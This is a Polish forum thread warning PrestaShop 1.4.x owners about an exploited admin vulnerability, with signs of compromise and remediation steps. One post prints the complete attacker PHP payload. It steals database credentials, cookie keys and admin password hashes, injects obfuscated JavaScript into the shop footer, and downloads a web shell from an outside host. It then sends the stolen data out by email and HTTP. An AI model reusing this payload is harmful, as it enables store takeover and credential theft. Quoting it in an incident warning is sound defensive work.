Skocz do zawartości
sower

Dziura w prestashop 1.4.x

Rekomendowane odpowiedzi

Niestety ktoś znalazł dziurę w prestashop 1.4.x i w necie pojawił się exploit wykorzystujący dziurę PS i niestety już widać tego efekty

 

W dniu wczorajszym PS TEAM opublikował poprawkę usuwającą lukę.

 

---->

Dotyczy to tylko wersji PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, ale nie wszystkie sklepy oparte na tych wersjach posiadają w/w lukę.

 

Więcej info na http://www.prestashop.com/blog/article/ ... procedure/

 

Wszystkim, którzy korzystają z wersji presty 1.4.x sugeruję sprawdzić swoje sklepy - bo w innym przypadku stracą kontrolę nad własnym sklepem ;) - w razie kłopotów służę pomocą ;)

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Dotyczy to tylko wersji PrestaShop 1.4/1.4.1/1.4.2/1.4.3/1.4.4, ale nie wszystkie sklepy oparte na tych wersjach posiadają w/w lukę.

Niestety nie mogę się z Tobą zgodzić. Lukę tę posiadają niestety wszystkie wyżej wymienione wersje. Osoby które między 23 sierpnia w godzinach popołudniowych (pierwszy post na forum prestashop.com 02:50 PM) a 24 sierpnia godz 12:42 PM (komunikat Prestashop Team na tym samym forum) zalogowały się do BackOffice-u prawdopodobnie zostały zaatakowane. Inne osoby mogą się uważać za szczęściarzy ;)

 

Przebieg całej akcji można prześledzić w poniższym linku:

http://www.prestashop.com/forums/topic/ ... erability/

 

Luka znjduje się w pliku: admin/adminHome.php i bezwzględnie wszystkim posiadającym sklepy oparte o w/w wersje Prestashop doradzam:

Sprawdzić czy:

- plik her.php znajduje się w katalogu /modules (może go nie być ponieważ po wykonaniu ulega samo-destrukcji)

- jakiś plik .php inny niż index.php znajduje się w katalogu /upload oraz /download (np: 6f7dgvfd7683hcdst3j2nj.php)

- Twój plik footer.tpl został zmodifikowany

- Twój katalog tools/smarty_v2 dalej istnieje

 

Jeżeli któraś z tych rzeczy miała miejsce obowiązkowo MUSISZ!!!

 

- zmienić hasło do bazy danych (nie zapomnij zmienić hasła na nowe w pliku config/settings.inc.php)

- ścągnij łatkę opublikowaną przez prestashop (link do fixa: http://addons.prestashop.com/fr/herfix/)

- wgraj plik herfix.php do głównego katalogu sklepu

- w pasku adresu przeglądarki wpisz: http://twoj_sklep.pl/herfix.php (trzeba oczywiście zmienić nazwę domeny na Twoją)

- zmienić nazwę katalogu admin

- zmienić wszystkie hasła pracowników w BackOffice

No i to chba na tyle ;)

 

 

Dla dociekliwych kod który, mógł zostać wykonany lub też może się wkraść :shock:

 

<?phperror_reporting(0);$shcode = "{literal}".base64_decode("PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlLmFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO307T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWlmKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgcz0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubGVuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLDEwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDgtbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8sNDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzLW8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctbyw0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDExMy1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4LW8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLDYyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtbywxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMDctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMTAtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLDEwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1vXTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tKGUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=")."{/literal}";$shurl = "http://www.c2bill.it/stest/chkpnt/shell.txt";  $msgurl = "http://www.c2bill.it/stest/chkpnt/sdata.php";$mails = "samuvel_hitroy@aol.com, preop@gmx.com";function deletedir($arg){   $d=opendir($arg);  while($f=readdir($d)){     if($f!="."&&$f!=".."){        if(is_dir($arg."/".$f))        deletedir($arg."/".$f);       else         unlink($arg."/".$f);     }  }  rmdir($arg);closedir($d);}@include("../config/settings.inc.php");///Host info$hostvar = "host:".$_SERVER["HTTP_HOST"]."\n"."ref:".$_SERVER["HTTP_REFERER"]."\n"."path:".$_SERVER["SCRIPT_FILENAME"]."\n=====\n";///Server info$srvvar =  _DB_SERVER_."\n"._DB_USER_."\n"._DB_PASSWD_."\n"._DB_NAME_."\n"._DB_PREFIX_."\n"._COOKIE_KEY_."\n"._COOKIE_IV_."\n"._PS_VERSION_."\n=====\n";///GET adminmysql_connect(_DB_SERVER_,_DB_USER_,_DB_PASSWD_);mysql_selectdb(_DB_NAME_);$r = mysql_query("SELECT `email`, `passwd` FROM `"._DB_PREFIX_."employee` WHERE id_profile = 1");while($ro=mysql_fetch_assoc($r)){$usrs .= $ro['email'].":".$ro['passwd']."\n";}//Wride sploit@deletedir("../tools/smarty/compile/");@deletedir("../tools/smarty/cache/"); @deletedir("../tools/smarty_v2/"); @deletedir("../tools/smarty_v2/"); $fn = "../themes/"._THEME_NAME_."/footer.tpl";$f = fopen($fn,"r");$ff = fread($f,filesize($fn));fclose($f);$ff = str_replace("</body>","                                     ".$shcode."</body>",$ff);$f = fopen($fn,"w");$rf = fwrite($f,$ff);fclose($f); if($rf>0) $wrres = "true"; else $wrres = "false";//write shell$sh = file_get_contents($shurl);$shf = "../upload/".md5(date("r")).".php"; $f = fopen($shf,"w");$rf = fwrite($f,$sh);fclose($f);$shf2 = "../download/".md5(date("r")).".php"; $f = fopen($shf2,"w");$rf = fwrite($f,$sh);fclose($f);@unlink("../download/.htaccess");$msg = $hostvar.$srvvar.$usrs."=====\nTemplate writed:".$wrres."\n=====\nShells:\n".$shf."\n".$shf2."\n=====\n";@mail($mails,"new shop",$msg);@file_get_contents($msgurl."?data=".base64_encode($msg));@unlink(__FILE__);?>
Jak widać nie wygląda to dość "szczęśliwie" dlatego mocno polecam zainteresowanie się aktualizacją

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

jeżeli masz sklep, który już był w sierpniu uruchomiony ;) to sprawdz

czy w katalogu /modules znajduje się plik her.php - jeżeli masz to niestety musisz przejść procedurę bezpieczeństwa ;)

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Dzięki za szybką odpowiedź. A moja wina , że nie napisałem wcześniej. Sklep nie jest jeszcze uruchomiony, choć jest na etapie uzupełniania towaru. Czy to ma znaczenie? W tym katalogu mam tylko inne foldery i plik index.php. Jeżeli mam nie zainfekowane pliki, to muszę coś robić , żeby do tego nie doszło?

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się



  • Przeglądający

    Brak zarejestrowanych użytkowników, przeglądających tę stronę.

  • Aktywni użytkownicy

    Nikt jeszcze nie otrzymał reputacji w tym tygodniu.

  • Statystyki forum

    • Tematów
      7 715
    • Postów
      36 971
×